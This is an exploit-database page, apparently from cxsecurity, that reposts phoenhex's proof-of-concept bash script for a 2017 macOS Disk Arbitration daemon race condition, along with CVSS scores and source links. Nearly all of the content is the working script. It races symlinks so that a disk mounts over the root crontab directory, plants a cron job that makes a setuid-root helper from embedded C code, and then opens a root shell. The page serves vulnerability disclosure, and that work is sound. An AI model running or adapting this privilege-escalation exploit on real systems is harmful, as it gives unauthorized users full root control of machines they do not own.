Apple macOS - Disk Arbitration Daemon Race Condition

2017.06.10
Credit: phoenhex
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/bash # Sources: # https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh # https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc if ! security authorize system.volume.internal.mount &>/dev/null; then echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work." exit 1 fi TARGET=/private/var/at SUBDIR=tabs DISK=/dev/disk0s1 TMPDIR=/tmp/pwn mkdir -p $TMPDIR cd $TMPDIR cat << EOF > boom.c #include <assert.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char ** argv) { assert(argc == 2); setuid(0); setgid(0); system(argv[1]); } EOF clang boom.c -o _boom || exit 1 race_link() { mkdir -p mounts while true; do ln -snf mounts link ln -snf $TARGET link done } race_mount() { while ! df -h | grep $TARGET >/dev/null; do while df -h | grep $DISK >/dev/null; do diskutil umount $DISK &>/dev/null done while ! df -h | grep $DISK >/dev/null; do diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null done done } cleanup() { echo "Killing child process $PID and cleaning up tmp dir" kill -9 $PID rm -rf $TMPDIR } if df -h | grep $DISK >/dev/null; then echo 2>&1 "$DISK already mounted. Exiting." exit 1 fi race_link & PID=$! trap cleanup EXIT echo "Just imagine having that root shell. It's gonna be legen..." race_mount echo "wait for it..." CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom" rm -f /var/at/tabs/root echo "* * * * *" "$CMD" > /var/at/tabs/root while ! [ -e $TMPDIR/boom ]; do sleep 1 done echo "dary!" kill -9 $PID sleep 0.1 $TMPDIR/boom "rm /var/at/tabs/root" $TMPDIR/boom "umount -f $DISK" $TMPDIR/boom "rm -rf $TMPDIR; cd /; su"

References:

https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top